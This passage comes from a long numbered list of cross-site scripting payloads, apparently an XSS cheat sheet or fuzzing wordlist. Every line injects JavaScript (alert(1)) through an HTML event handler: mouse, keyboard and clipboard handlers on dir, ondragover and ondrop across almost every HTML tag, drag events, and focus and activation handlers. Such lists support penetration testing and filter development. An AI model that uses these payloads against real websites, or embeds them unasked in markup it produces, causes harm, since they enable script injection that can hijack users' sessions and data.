  3074. <dir onbeforepaste="alert(1)" contenteditable>test</dir>
  3075. <dir onblur=alert(1) tabindex=1 id=x></dir><input autofocus>
  3076. <dir onclick="alert(1)">test</dir>
  3077. <dir oncontextmenu="alert(1)">test</dir>
  3078. <dir oncopy="alert(1)" contenteditable>test</dir>
  3079. <dir oncut="alert(1)" contenteditable>test</dir>
  3080. <dir ondblclick="alert(1)">test</dir>
  3081. <dir onfocusout=alert(1) tabindex=1 id=x></dir><input autofocus>
  3082. <dir onkeydown="alert(1)" contenteditable>test</dir>
  3083. <dir onkeypress="alert(1)" contenteditable>test</dir>
  3084. <dir onkeyup="alert(1)" contenteditable>test</dir>
  3085. <dir onmousedown="alert(1)">test</dir>
  3086. <dir onmouseenter="alert(1)">test</dir>
  3087. <dir onmouseleave="alert(1)">test</dir>
  3088. <dir onmousemove="alert(1)">test</dir>
  3089. <dir onmouseout="alert(1)">test</dir>
  3090. <dir onmouseover="alert(1)">test</dir>
  3091. <dir onmouseup="alert(1)">test</dir>
  3092. <dir onpaste="alert(1)" contenteditable>test</dir>
  3093. <div draggable="true" contenteditable>drag me</div><a ondragover=alert(1) contenteditable>drop here</a>
  3094. <div draggable="true" contenteditable>drag me</div><a ondrop=alert(1) contenteditable>drop here</a>
  3095. <div draggable="true" contenteditable>drag me</div><abbr ondragover=alert(1) contenteditable>drop here</abbr>
  3096. <div draggable="true" contenteditable>drag me</div><abbr ondrop=alert(1) contenteditable>drop here</abbr>
  3097. <div draggable="true" contenteditable>drag me</div><acronym ondragover=alert(1) contenteditable>drop here</acronym>
  3098. <div draggable="true" contenteditable>drag me</div><acronym ondrop=alert(1) contenteditable>drop here</acronym>
  3099. <div draggable="true" contenteditable>drag me</div><address ondragover=alert(1) contenteditable>drop here</address>
  3100. <div draggable="true" contenteditable>drag me</div><address ondrop=alert(1) contenteditable>drop here</address>
  3101. <div draggable="true" contenteditable>drag me</div><applet ondragover=alert(1) contenteditable>drop here</applet>
  3102. <div draggable="true" contenteditable>drag me</div><applet ondrop=alert(1) contenteditable>drop here</applet>
  3103. <div draggable="true" contenteditable>drag me</div><area ondragover=alert(1) contenteditable>drop here</area>
  3104. <div draggable="true" contenteditable>drag me</div><area ondrop=alert(1) contenteditable>drop here</area>
  3105. <div draggable="true" contenteditable>drag me</div><article ondragover=alert(1) contenteditable>drop here</article>
  3106. <div draggable="true" contenteditable>drag me</div><article ondrop=alert(1) contenteditable>drop here</article>
  3107. <div draggable="true" contenteditable>drag me</div><aside ondragover=alert(1) contenteditable>drop here</aside>
  3108. <div draggable="true" contenteditable>drag me</div><aside ondrop=alert(1) contenteditable>drop here</aside>
  3109. <div draggable="true" contenteditable>drag me</div><audio ondragover=alert(1) contenteditable>drop here</audio>
  3110. <div draggable="true" contenteditable>drag me</div><audio ondrop=alert(1) contenteditable>drop here</audio>
  3111. <div draggable="true" contenteditable>drag me</div><b ondragover=alert(1) contenteditable>drop here</b>
  3112. <div draggable="true" contenteditable>drag me</div><b ondrop=alert(1) contenteditable>drop here</b>
  3113. <div draggable="true" contenteditable>drag me</div><base ondragover=alert(1) contenteditable>drop here</base>
  3114. <div draggable="true" contenteditable>drag me</div><base ondrop=alert(1) contenteditable>drop here</base>
  3115. <div draggable="true" contenteditable>drag me</div><basefont ondragover=alert(1) contenteditable>drop here</basefont>
  3116. <div draggable="true" contenteditable>drag me</div><basefont ondrop=alert(1) contenteditable>drop here</basefont>
  3117. <div draggable="true" contenteditable>drag me</div><bdi ondragover=alert(1) contenteditable>drop here</bdi>
  3118. <div draggable="true" contenteditable>drag me</div><bdi ondrop=alert(1) contenteditable>drop here</bdi>
  3119. <div draggable="true" contenteditable>drag me</div><bdo ondragover=alert(1) contenteditable>drop here</bdo>
  3120. <div draggable="true" contenteditable>drag me</div><bdo ondrop=alert(1) contenteditable>drop here</bdo>
  3121. <div draggable="true" contenteditable>drag me</div><bgsound ondragover=alert(1) contenteditable>drop here</bgsound>
  3122. <div draggable="true" contenteditable>drag me</div><bgsound ondrop=alert(1) contenteditable>drop here</bgsound>
  3123. <div draggable="true" contenteditable>drag me</div><big ondragover=alert(1) contenteditable>drop here</big>
  3124. <div draggable="true" contenteditable>drag me</div><big ondrop=alert(1) contenteditable>drop here</big>
  3125. <div draggable="true" contenteditable>drag me</div><blink ondragover=alert(1) contenteditable>drop here</blink>
  3126. <div draggable="true" contenteditable>drag me</div><blink ondrop=alert(1) contenteditable>drop here</blink>
  3127. <div draggable="true" contenteditable>drag me</div><blockquote ondragover=alert(1) contenteditable>drop here</blockquote>
  3128. <div draggable="true" contenteditable>drag me</div><blockquote ondrop=alert(1) contenteditable>drop here</blockquote>
  3129. <div draggable="true" contenteditable>drag me</div><body ondragover=alert(1) contenteditable>drop here</body>
  3130. <div draggable="true" contenteditable>drag me</div><body ondrop=alert(1) contenteditable>drop here</body>
  3131. <div draggable="true" contenteditable>drag me</div><br ondragover=alert(1) contenteditable>drop here</br>
  3132. <div draggable="true" contenteditable>drag me</div><br ondrop=alert(1) contenteditable>drop here</br>
  3133. <div draggable="true" contenteditable>drag me</div><button ondragover=alert(1) contenteditable>drop here</button>
  3134. <div draggable="true" contenteditable>drag me</div><button ondrop=alert(1) contenteditable>drop here</button>
  3135. <div draggable="true" contenteditable>drag me</div><canvas ondragover=alert(1) contenteditable>drop here</canvas>
  3136. <div draggable="true" contenteditable>drag me</div><canvas ondrop=alert(1) contenteditable>drop here</canvas>
  3137. <div draggable="true" contenteditable>drag me</div><caption ondragover=alert(1) contenteditable>drop here</caption>
  3138. <div draggable="true" contenteditable>drag me</div><caption ondrop=alert(1) contenteditable>drop here</caption>
  3139. <div draggable="true" contenteditable>drag me</div><center ondragover=alert(1) contenteditable>drop here</center>
  3140. <div draggable="true" contenteditable>drag me</div><center ondrop=alert(1) contenteditable>drop here</center>
  3141. <div draggable="true" contenteditable>drag me</div><cite ondragover=alert(1) contenteditable>drop here</cite>
  3142. <div draggable="true" contenteditable>drag me</div><cite ondrop=alert(1) contenteditable>drop here</cite>
  3143. <div draggable="true" contenteditable>drag me</div><code ondragover=alert(1) contenteditable>drop here</code>
  3144. <div draggable="true" contenteditable>drag me</div><code ondrop=alert(1) contenteditable>drop here</code>
  3145. <div draggable="true" contenteditable>drag me</div><col ondragover=alert(1) contenteditable>drop here</col>
  3146. <div draggable="true" contenteditable>drag me</div><col ondrop=alert(1) contenteditable>drop here</col>
  3147. <div draggable="true" contenteditable>drag me</div><colgroup ondragover=alert(1) contenteditable>drop here</colgroup>
  3148. <div draggable="true" contenteditable>drag me</div><colgroup ondrop=alert(1) contenteditable>drop here</colgroup>
  3149. <div draggable="true" contenteditable>drag me</div><command ondragover=alert(1) contenteditable>drop here</command>
  3150. <div draggable="true" contenteditable>drag me</div><command ondrop=alert(1) contenteditable>drop here</command>
  3151. <div draggable="true" contenteditable>drag me</div><content ondragover=alert(1) contenteditable>drop here</content>
  3152. <div draggable="true" contenteditable>drag me</div><content ondrop=alert(1) contenteditable>drop here</content>
  3153. <div draggable="true" contenteditable>drag me</div><data ondragover=alert(1) contenteditable>drop here</data>
  3154. <div draggable="true" contenteditable>drag me</div><data ondrop=alert(1) contenteditable>drop here</data>
  3155. <div draggable="true" contenteditable>drag me</div><datalist ondragover=alert(1) contenteditable>drop here</datalist>
  3156. <div draggable="true" contenteditable>drag me</div><datalist ondrop=alert(1) contenteditable>drop here</datalist>
  3157. <div draggable="true" contenteditable>drag me</div><dd ondragover=alert(1) contenteditable>drop here</dd>
  3158. <div draggable="true" contenteditable>drag me</div><dd ondrop=alert(1) contenteditable>drop here</dd>
  3159. <div draggable="true" contenteditable>drag me</div><del ondragover=alert(1) contenteditable>drop here</del>
  3160. <div draggable="true" contenteditable>drag me</div><del ondrop=alert(1) contenteditable>drop here</del>
  3161. <div draggable="true" contenteditable>drag me</div><details ondragover=alert(1) contenteditable>drop here</details>
  3162. <div draggable="true" contenteditable>drag me</div><details ondrop=alert(1) contenteditable>drop here</details>
  3163. <div draggable="true" contenteditable>drag me</div><dfn ondragover=alert(1) contenteditable>drop here</dfn>
  3164. <div draggable="true" contenteditable>drag me</div><dfn ondrop=alert(1) contenteditable>drop here</dfn>
  3165. <div draggable="true" contenteditable>drag me</div><dialog ondragover=alert(1) contenteditable>drop here</dialog>
  3166. <div draggable="true" contenteditable>drag me</div><dialog ondrop=alert(1) contenteditable>drop here</dialog>
  3167. <div draggable="true" contenteditable>drag me</div><dir ondragover=alert(1) contenteditable>drop here</dir>
  3168. <div draggable="true" contenteditable>drag me</div><dir ondrop=alert(1) contenteditable>drop here</dir>
  3169. <div draggable="true" contenteditable>drag me</div><div ondragover=alert(1) contenteditable>drop here</div>
  3170. <div draggable="true" contenteditable>drag me</div><div ondrop=alert(1) contenteditable>drop here</div>
  3171. <div draggable="true" contenteditable>drag me</div><dl ondragover=alert(1) contenteditable>drop here</dl>
  3172. <div draggable="true" contenteditable>drag me</div><dl ondrop=alert(1) contenteditable>drop here</dl>
  3173. <div draggable="true" contenteditable>drag me</div><dt ondragover=alert(1) contenteditable>drop here</dt>
  3174. <div draggable="true" contenteditable>drag me</div><dt ondrop=alert(1) contenteditable>drop here</dt>
  3175. <div draggable="true" contenteditable>drag me</div><element ondragover=alert(1) contenteditable>drop here</element>
  3176. <div draggable="true" contenteditable>drag me</div><element ondrop=alert(1) contenteditable>drop here</element>
  3177. <div draggable="true" contenteditable>drag me</div><em ondragover=alert(1) contenteditable>drop here</em>
  3178. <div draggable="true" contenteditable>drag me</div><em ondrop=alert(1) contenteditable>drop here</em>
  3179. <div draggable="true" contenteditable>drag me</div><embed ondragover=alert(1) contenteditable>drop here</embed>
  3180. <div draggable="true" contenteditable>drag me</div><embed ondrop=alert(1) contenteditable>drop here</embed>
  3181. <div draggable="true" contenteditable>drag me</div><fieldset ondragover=alert(1) contenteditable>drop here</fieldset>
  3182. <div draggable="true" contenteditable>drag me</div><fieldset ondrop=alert(1) contenteditable>drop here</fieldset>
  3183. <div draggable="true" contenteditable>drag me</div><figcaption ondragover=alert(1) contenteditable>drop here</figcaption>
  3184. <div draggable="true" contenteditable>drag me</div><figcaption ondrop=alert(1) contenteditable>drop here</figcaption>
  3185. <div draggable="true" contenteditable>drag me</div><figure ondragover=alert(1) contenteditable>drop here</figure>
  3186. <div draggable="true" contenteditable>drag me</div><figure ondrop=alert(1) contenteditable>drop here</figure>
  3187. <div draggable="true" contenteditable>drag me</div><font ondragover=alert(1) contenteditable>drop here</font>
  3188. <div draggable="true" contenteditable>drag me</div><font ondrop=alert(1) contenteditable>drop here</font>
  3189. <div draggable="true" contenteditable>drag me</div><footer ondragover=alert(1) contenteditable>drop here</footer>
  3190. <div draggable="true" contenteditable>drag me</div><footer ondrop=alert(1) contenteditable>drop here</footer>
  3191. <div draggable="true" contenteditable>drag me</div><form ondragover=alert(1) contenteditable>drop here</form>
  3192. <div draggable="true" contenteditable>drag me</div><form ondrop=alert(1) contenteditable>drop here</form>
  3193. <div draggable="true" contenteditable>drag me</div><frame ondragover=alert(1) contenteditable>drop here</frame>
  3194. <div draggable="true" contenteditable>drag me</div><frame ondrop=alert(1) contenteditable>drop here</frame>
  3195. <div draggable="true" contenteditable>drag me</div><frameset ondragover=alert(1) contenteditable>drop here</frameset>
  3196. <div draggable="true" contenteditable>drag me</div><frameset ondrop=alert(1) contenteditable>drop here</frameset>
  3197. <div draggable="true" contenteditable>drag me</div><h1 ondragover=alert(1) contenteditable>drop here</h1>
  3198. <div draggable="true" contenteditable>drag me</div><h1 ondrop=alert(1) contenteditable>drop here</h1>
  3199. <div draggable="true" contenteditable>drag me</div><head ondragover=alert(1) contenteditable>drop here</head>
  3200. <div draggable="true" contenteditable>drag me</div><head ondrop=alert(1) contenteditable>drop here</head>
  3201. <div draggable="true" contenteditable>drag me</div><header ondragover=alert(1) contenteditable>drop here</header>
  3202. <div draggable="true" contenteditable>drag me</div><header ondrop=alert(1) contenteditable>drop here</header>
  3203. <div draggable="true" contenteditable>drag me</div><hgroup ondragover=alert(1) contenteditable>drop here</hgroup>
  3204. <div draggable="true" contenteditable>drag me</div><hgroup ondrop=alert(1) contenteditable>drop here</hgroup>
  3205. <div draggable="true" contenteditable>drag me</div><hr ondragover=alert(1) contenteditable>drop here</hr>
  3206. <div draggable="true" contenteditable>drag me</div><hr ondrop=alert(1) contenteditable>drop here</hr>
  3207. <div draggable="true" contenteditable>drag me</div><html ondragover=alert(1) contenteditable>drop here</html>
  3208. <div draggable="true" contenteditable>drag me</div><html ondrop=alert(1) contenteditable>drop here</html>
  3209. <div draggable="true" contenteditable>drag me</div><i ondragover=alert(1) contenteditable>drop here</i>
  3210. <div draggable="true" contenteditable>drag me</div><i ondrop=alert(1) contenteditable>drop here</i>
  3211. <div draggable="true" contenteditable>drag me</div><iframe ondragover=alert(1) contenteditable>drop here</iframe>
  3212. <div draggable="true" contenteditable>drag me</div><iframe ondrop=alert(1) contenteditable>drop here</iframe>
  3213. <div draggable="true" contenteditable>drag me</div><image ondragover=alert(1) contenteditable>drop here</image>
  3214. <div draggable="true" contenteditable>drag me</div><image ondrop=alert(1) contenteditable>drop here</image>
  3215. <div draggable="true" contenteditable>drag me</div><img ondragover=alert(1) contenteditable>drop here</img>
  3216. <div draggable="true" contenteditable>drag me</div><img ondrop=alert(1) contenteditable>drop here</img>
  3217. <div draggable="true" contenteditable>drag me</div><input ondragover=alert(1) contenteditable>drop here</input>
  3218. <div draggable="true" contenteditable>drag me</div><input ondrop=alert(1) contenteditable>drop here</input>
  3219. <div draggable="true" contenteditable>drag me</div><ins ondragover=alert(1) contenteditable>drop here</ins>
  3220. <div draggable="true" contenteditable>drag me</div><ins ondrop=alert(1) contenteditable>drop here</ins>
  3221. <div draggable="true" contenteditable>drag me</div><isindex ondragover=alert(1) contenteditable>drop here</isindex>
  3222. <div draggable="true" contenteditable>drag me</div><isindex ondrop=alert(1) contenteditable>drop here</isindex>
  3223. <div draggable="true" contenteditable>drag me</div><kbd ondragover=alert(1) contenteditable>drop here</kbd>
  3224. <div draggable="true" contenteditable>drag me</div><kbd ondrop=alert(1) contenteditable>drop here</kbd>
  3225. <div draggable="true" contenteditable>drag me</div><keygen ondragover=alert(1) contenteditable>drop here</keygen>
  3226. <div draggable="true" contenteditable>drag me</div><keygen ondrop=alert(1) contenteditable>drop here</keygen>
  3227. <div draggable="true" contenteditable>drag me</div><label ondragover=alert(1) contenteditable>drop here</label>
  3228. <div draggable="true" contenteditable>drag me</div><label ondrop=alert(1) contenteditable>drop here</label>
  3229. <div draggable="true" contenteditable>drag me</div><legend ondragover=alert(1) contenteditable>drop here</legend>
  3230. <div draggable="true" contenteditable>drag me</div><legend ondrop=alert(1) contenteditable>drop here</legend>
  3231. <div draggable="true" contenteditable>drag me</div><li ondragover=alert(1) contenteditable>drop here</li>
  3232. <div draggable="true" contenteditable>drag me</div><li ondrop=alert(1) contenteditable>drop here</li>
  3233. <div draggable="true" contenteditable>drag me</div><link ondragover=alert(1) contenteditable>drop here</link>
  3234. <div draggable="true" contenteditable>drag me</div><link ondrop=alert(1) contenteditable>drop here</link>
  3235. <div draggable="true" contenteditable>drag me</div><listing ondragover=alert(1) contenteditable>drop here</listing>
  3236. <div draggable="true" contenteditable>drag me</div><listing ondrop=alert(1) contenteditable>drop here</listing>
  3237. <div draggable="true" contenteditable>drag me</div><main ondragover=alert(1) contenteditable>drop here</main>
  3238. <div draggable="true" contenteditable>drag me</div><main ondrop=alert(1) contenteditable>drop here</main>
  3239. <div draggable="true" contenteditable>drag me</div><map ondragover=alert(1) contenteditable>drop here</map>
  3240. <div draggable="true" contenteditable>drag me</div><map ondrop=alert(1) contenteditable>drop here</map>
  3241. <div draggable="true" contenteditable>drag me</div><mark ondragover=alert(1) contenteditable>drop here</mark>
  3242. <div draggable="true" contenteditable>drag me</div><mark ondrop=alert(1) contenteditable>drop here</mark>
  3243. <div draggable="true" contenteditable>drag me</div><marquee ondragover=alert(1) contenteditable>drop here</marquee>
  3244. <div draggable="true" contenteditable>drag me</div><marquee ondrop=alert(1) contenteditable>drop here</marquee>
  3245. <div draggable="true" contenteditable>drag me</div><menu ondragover=alert(1) contenteditable>drop here</menu>
  3246. <div draggable="true" contenteditable>drag me</div><menu ondrop=alert(1) contenteditable>drop here</menu>
  3247. <div draggable="true" contenteditable>drag me</div><menuitem ondragover=alert(1) contenteditable>drop here</menuitem>
  3248. <div draggable="true" contenteditable>drag me</div><menuitem ondrop=alert(1) contenteditable>drop here</menuitem>
  3249. <div draggable="true" contenteditable>drag me</div><meta ondragover=alert(1) contenteditable>drop here</meta>
  3250. <div draggable="true" contenteditable>drag me</div><meta ondrop=alert(1) contenteditable>drop here</meta>
  3251. <div draggable="true" contenteditable>drag me</div><meter ondragover=alert(1) contenteditable>drop here</meter>
  3252. <div draggable="true" contenteditable>drag me</div><meter ondrop=alert(1) contenteditable>drop here</meter>
  3253. <div draggable="true" contenteditable>drag me</div><multicol ondragover=alert(1) contenteditable>drop here</multicol>
  3254. <div draggable="true" contenteditable>drag me</div><multicol ondrop=alert(1) contenteditable>drop here</multicol>
  3255. <div draggable="true" contenteditable>drag me</div><nav ondragover=alert(1) contenteditable>drop here</nav>
  3256. <div draggable="true" contenteditable>drag me</div><nav ondrop=alert(1) contenteditable>drop here</nav>
  3257. <div draggable="true" contenteditable>drag me</div><nextid ondragover=alert(1) contenteditable>drop here</nextid>
  3258. <div draggable="true" contenteditable>drag me</div><nextid ondrop=alert(1) contenteditable>drop here</nextid>
  3259. <div draggable="true" contenteditable>drag me</div><nobr ondragover=alert(1) contenteditable>drop here</nobr>
  3260. <div draggable="true" contenteditable>drag me</div><nobr ondrop=alert(1) contenteditable>drop here</nobr>
  3261. <div draggable="true" contenteditable>drag me</div><noembed ondragover=alert(1) contenteditable>drop here</noembed>
  3262. <div draggable="true" contenteditable>drag me</div><noembed ondrop=alert(1) contenteditable>drop here</noembed>
  3263. <div draggable="true" contenteditable>drag me</div><noframes ondragover=alert(1) contenteditable>drop here</noframes>
  3264. <div draggable="true" contenteditable>drag me</div><noframes ondrop=alert(1) contenteditable>drop here</noframes>
  3265. <div draggable="true" contenteditable>drag me</div><noscript ondragover=alert(1) contenteditable>drop here</noscript>
  3266. <div draggable="true" contenteditable>drag me</div><noscript ondrop=alert(1) contenteditable>drop here</noscript>
  3267. <div draggable="true" contenteditable>drag me</div><object ondragover=alert(1) contenteditable>drop here</object>
  3268. <div draggable="true" contenteditable>drag me</div><object ondrop=alert(1) contenteditable>drop here</object>
  3269. <div draggable="true" contenteditable>drag me</div><ol ondragover=alert(1) contenteditable>drop here</ol>
  3270. <div draggable="true" contenteditable>drag me</div><ol ondrop=alert(1) contenteditable>drop here</ol>
  3271. <div draggable="true" contenteditable>drag me</div><optgroup ondragover=alert(1) contenteditable>drop here</optgroup>
  3272. <div draggable="true" contenteditable>drag me</div><optgroup ondrop=alert(1) contenteditable>drop here</optgroup>
  3273. <div draggable="true" contenteditable>drag me</div><option ondragover=alert(1) contenteditable>drop here</option>
  3274. <div draggable="true" contenteditable>drag me</div><option ondrop=alert(1) contenteditable>drop here</option>
  3275. <div draggable="true" contenteditable>drag me</div><output ondragover=alert(1) contenteditable>drop here</output>
  3276. <div draggable="true" contenteditable>drag me</div><output ondrop=alert(1) contenteditable>drop here</output>
  3277. <div draggable="true" contenteditable>drag me</div><p ondragover=alert(1) contenteditable>drop here</p>
  3278. <div draggable="true" contenteditable>drag me</div><p ondrop=alert(1) contenteditable>drop here</p>
  3279. <div draggable="true" contenteditable>drag me</div><param ondragover=alert(1) contenteditable>drop here</param>
  3280. <div draggable="true" contenteditable>drag me</div><param ondrop=alert(1) contenteditable>drop here</param>
  3281. <div draggable="true" contenteditable>drag me</div><picture ondragover=alert(1) contenteditable>drop here</picture>
  3282. <div draggable="true" contenteditable>drag me</div><picture ondrop=alert(1) contenteditable>drop here</picture>
  3283. <div draggable="true" contenteditable>drag me</div><plaintext ondragover=alert(1) contenteditable>drop here</plaintext>
  3284. <div draggable="true" contenteditable>drag me</div><plaintext ondrop=alert(1) contenteditable>drop here</plaintext>
  3285. <div draggable="true" contenteditable>drag me</div><pre ondragover=alert(1) contenteditable>drop here</pre>
  3286. <div draggable="true" contenteditable>drag me</div><pre ondrop=alert(1) contenteditable>drop here</pre>
  3287. <div draggable="true" contenteditable>drag me</div><progress ondragover=alert(1) contenteditable>drop here</progress>
  3288. <div draggable="true" contenteditable>drag me</div><progress ondrop=alert(1) contenteditable>drop here</progress>
  3289. <div draggable="true" contenteditable>drag me</div><q ondragover=alert(1) contenteditable>drop here</q>
  3290. <div draggable="true" contenteditable>drag me</div><q ondrop=alert(1) contenteditable>drop here</q>
  3291. <div draggable="true" contenteditable>drag me</div><rb ondragover=alert(1) contenteditable>drop here</rb>
  3292. <div draggable="true" contenteditable>drag me</div><rb ondrop=alert(1) contenteditable>drop here</rb>
  3293. <div draggable="true" contenteditable>drag me</div><rp ondragover=alert(1) contenteditable>drop here</rp>
  3294. <div draggable="true" contenteditable>drag me</div><rp ondrop=alert(1) contenteditable>drop here</rp>
  3295. <div draggable="true" contenteditable>drag me</div><rt ondragover=alert(1) contenteditable>drop here</rt>
  3296. <div draggable="true" contenteditable>drag me</div><rt ondrop=alert(1) contenteditable>drop here</rt>
  3297. <div draggable="true" contenteditable>drag me</div><rtc ondragover=alert(1) contenteditable>drop here</rtc>
  3298. <div draggable="true" contenteditable>drag me</div><rtc ondrop=alert(1) contenteditable>drop here</rtc>
  3299. <div draggable="true" contenteditable>drag me</div><ruby ondragover=alert(1) contenteditable>drop here</ruby>
  3300. <div draggable="true" contenteditable>drag me</div><ruby ondrop=alert(1) contenteditable>drop here</ruby>
  3301. <div draggable="true" contenteditable>drag me</div><s ondragover=alert(1) contenteditable>drop here</s>
  3302. <div draggable="true" contenteditable>drag me</div><s ondrop=alert(1) contenteditable>drop here</s>
  3303. <div draggable="true" contenteditable>drag me</div><samp ondragover=alert(1) contenteditable>drop here</samp>
  3304. <div draggable="true" contenteditable>drag me</div><samp ondrop=alert(1) contenteditable>drop here</samp>
  3305. <div draggable="true" contenteditable>drag me</div><script ondragover=alert(1) contenteditable>drop here</script>
  3306. <div draggable="true" contenteditable>drag me</div><script ondrop=alert(1) contenteditable>drop here</script>
  3307. <div draggable="true" contenteditable>drag me</div><section ondragover=alert(1) contenteditable>drop here</section>
  3308. <div draggable="true" contenteditable>drag me</div><section ondrop=alert(1) contenteditable>drop here</section>
  3309. <div draggable="true" contenteditable>drag me</div><select ondragover=alert(1) contenteditable>drop here</select>
  3310. <div draggable="true" contenteditable>drag me</div><select ondrop=alert(1) contenteditable>drop here</select>
  3311. <div draggable="true" contenteditable>drag me</div><shadow ondragover=alert(1) contenteditable>drop here</shadow>
  3312. <div draggable="true" contenteditable>drag me</div><shadow ondrop=alert(1) contenteditable>drop here</shadow>
  3313. <div draggable="true" contenteditable>drag me</div><slot ondragover=alert(1) contenteditable>drop here</slot>
  3314. <div draggable="true" contenteditable>drag me</div><slot ondrop=alert(1) contenteditable>drop here</slot>
  3315. <div draggable="true" contenteditable>drag me</div><small ondragover=alert(1) contenteditable>drop here</small>
  3316. <div draggable="true" contenteditable>drag me</div><small ondrop=alert(1) contenteditable>drop here</small>
  3317. <div draggable="true" contenteditable>drag me</div><source ondragover=alert(1) contenteditable>drop here</source>
  3318. <div draggable="true" contenteditable>drag me</div><source ondrop=alert(1) contenteditable>drop here</source>
  3319. <div draggable="true" contenteditable>drag me</div><spacer ondragover=alert(1) contenteditable>drop here</spacer>
  3320. <div draggable="true" contenteditable>drag me</div><spacer ondrop=alert(1) contenteditable>drop here</spacer>
  3321. <div draggable="true" contenteditable>drag me</div><span ondragover=alert(1) contenteditable>drop here</span>
  3322. <div draggable="true" contenteditable>drag me</div><span ondrop=alert(1) contenteditable>drop here</span>
  3323. <div draggable="true" contenteditable>drag me</div><strike ondragover=alert(1) contenteditable>drop here</strike>
  3324. <div draggable="true" contenteditable>drag me</div><strike ondrop=alert(1) contenteditable>drop here</strike>
  3325. <div draggable="true" contenteditable>drag me</div><strong ondragover=alert(1) contenteditable>drop here</strong>
  3326. <div draggable="true" contenteditable>drag me</div><strong ondrop=alert(1) contenteditable>drop here</strong>
  3327. <div draggable="true" contenteditable>drag me</div><style ondragover=alert(1) contenteditable>drop here</style>
  3328. <div draggable="true" contenteditable>drag me</div><style ondrop=alert(1) contenteditable>drop here</style>
  3329. <div draggable="true" contenteditable>drag me</div><sub ondragover=alert(1) contenteditable>drop here</sub>
  3330. <div draggable="true" contenteditable>drag me</div><sub ondrop=alert(1) contenteditable>drop here</sub>
  3331. <div draggable="true" contenteditable>drag me</div><summary ondragover=alert(1) contenteditable>drop here</summary>
  3332. <div draggable="true" contenteditable>drag me</div><summary ondrop=alert(1) contenteditable>drop here</summary>
  3333. <div draggable="true" contenteditable>drag me</div><sup ondragover=alert(1) contenteditable>drop here</sup>
  3334. <div draggable="true" contenteditable>drag me</div><sup ondrop=alert(1) contenteditable>drop here</sup>
  3335. <div draggable="true" contenteditable>drag me</div><svg ondragover=alert(1) contenteditable>drop here</svg>
  3336. <div draggable="true" contenteditable>drag me</div><svg ondrop=alert(1) contenteditable>drop here</svg>
  3337. <div draggable="true" contenteditable>drag me</div><table ondragover=alert(1) contenteditable>drop here</table>
  3338. <div draggable="true" contenteditable>drag me</div><table ondrop=alert(1) contenteditable>drop here</table>
  3339. <div draggable="true" contenteditable>drag me</div><tbody ondragover=alert(1) contenteditable>drop here</tbody>
  3340. <div draggable="true" contenteditable>drag me</div><tbody ondrop=alert(1) contenteditable>drop here</tbody>
  3341. <div draggable="true" contenteditable>drag me</div><td ondragover=alert(1) contenteditable>drop here</td>
  3342. <div draggable="true" contenteditable>drag me</div><td ondrop=alert(1) contenteditable>drop here</td>
  3343. <div draggable="true" contenteditable>drag me</div><template ondragover=alert(1) contenteditable>drop here</template>
  3344. <div draggable="true" contenteditable>drag me</div><template ondrop=alert(1) contenteditable>drop here</template>
  3345. <div draggable="true" contenteditable>drag me</div><textarea ondragover=alert(1) contenteditable>drop here</textarea>
  3346. <div draggable="true" contenteditable>drag me</div><textarea ondrop=alert(1) contenteditable>drop here</textarea>
  3347. <div draggable="true" contenteditable>drag me</div><tfoot ondragover=alert(1) contenteditable>drop here</tfoot>
  3348. <div draggable="true" contenteditable>drag me</div><tfoot ondrop=alert(1) contenteditable>drop here</tfoot>
  3349. <div draggable="true" contenteditable>drag me</div><th ondragover=alert(1) contenteditable>drop here</th>
  3350. <div draggable="true" contenteditable>drag me</div><th ondrop=alert(1) contenteditable>drop here</th>
  3351. <div draggable="true" contenteditable>drag me</div><thead ondragover=alert(1) contenteditable>drop here</thead>
  3352. <div draggable="true" contenteditable>drag me</div><thead ondrop=alert(1) contenteditable>drop here</thead>
  3353. <div draggable="true" contenteditable>drag me</div><time ondragover=alert(1) contenteditable>drop here</time>
  3354. <div draggable="true" contenteditable>drag me</div><time ondrop=alert(1) contenteditable>drop here</time>
  3355. <div draggable="true" contenteditable>drag me</div><title ondragover=alert(1) contenteditable>drop here</title>
  3356. <div draggable="true" contenteditable>drag me</div><title ondrop=alert(1) contenteditable>drop here</title>
  3357. <div draggable="true" contenteditable>drag me</div><tr ondragover=alert(1) contenteditable>drop here</tr>
  3358. <div draggable="true" contenteditable>drag me</div><tr ondrop=alert(1) contenteditable>drop here</tr>
  3359. <div draggable="true" contenteditable>drag me</div><track ondragover=alert(1) contenteditable>drop here</track>
  3360. <div draggable="true" contenteditable>drag me</div><track ondrop=alert(1) contenteditable>drop here</track>
  3361. <div draggable="true" contenteditable>drag me</div><tt ondragover=alert(1) contenteditable>drop here</tt>
  3362. <div draggable="true" contenteditable>drag me</div><tt ondrop=alert(1) contenteditable>drop here</tt>
  3363. <div draggable="true" contenteditable>drag me</div><u ondragover=alert(1) contenteditable>drop here</u>
  3364. <div draggable="true" contenteditable>drag me</div><u ondrop=alert(1) contenteditable>drop here</u>
  3365. <div draggable="true" contenteditable>drag me</div><ul ondragover=alert(1) contenteditable>drop here</ul>
  3366. <div draggable="true" contenteditable>drag me</div><ul ondrop=alert(1) contenteditable>drop here</ul>
  3367. <div draggable="true" contenteditable>drag me</div><var ondragover=alert(1) contenteditable>drop here</var>
  3368. <div draggable="true" contenteditable>drag me</div><var ondrop=alert(1) contenteditable>drop here</var>
  3369. <div draggable="true" contenteditable>drag me</div><video ondragover=alert(1) contenteditable>drop here</video>
  3370. <div draggable="true" contenteditable>drag me</div><video ondrop=alert(1) contenteditable>drop here</video>
  3371. <div draggable="true" contenteditable>drag me</div><wbr ondragover=alert(1) contenteditable>drop here</wbr>
  3372. <div draggable="true" contenteditable>drag me</div><wbr ondrop=alert(1) contenteditable>drop here</wbr>
  3373. <div draggable="true" contenteditable>drag me</div><xmp ondragover=alert(1) contenteditable>drop here</xmp>
  3374. <div draggable="true" contenteditable>drag me</div><xmp ondrop=alert(1) contenteditable>drop here</xmp>
  3375. <div draggable="true" ondrag="alert(1)">test</div>
  3376. <div draggable="true" ondragend="alert(1)">test</div>
  3377. <div draggable="true" ondragenter="alert(1)">test</div>
  3378. <div draggable="true" ondragleave="alert(1)">test</div>
  3379. <div draggable="true" ondragstart="alert(1)">test</div>
  3380. <div id=x tabindex=1 onactivate=alert(1)></div>
  3381. <div id=x tabindex=1 onbeforeactivate=alert(1)></div>
  3382. <div id=x tabindex=1 onbeforedeactivate=alert(1)></div><input autofocus>
  3383. <div id=x tabindex=1 ondeactivate=alert(1)></div><input id=y autofocus>
  3384. <div id=x tabindex=1 onfocus=alert(1)></div>
  3385. <div id=x tabindex=1 onfocusin=alert(1)></div>
  3386. <div onbeforecopy="alert(1)" contenteditable>test</div>
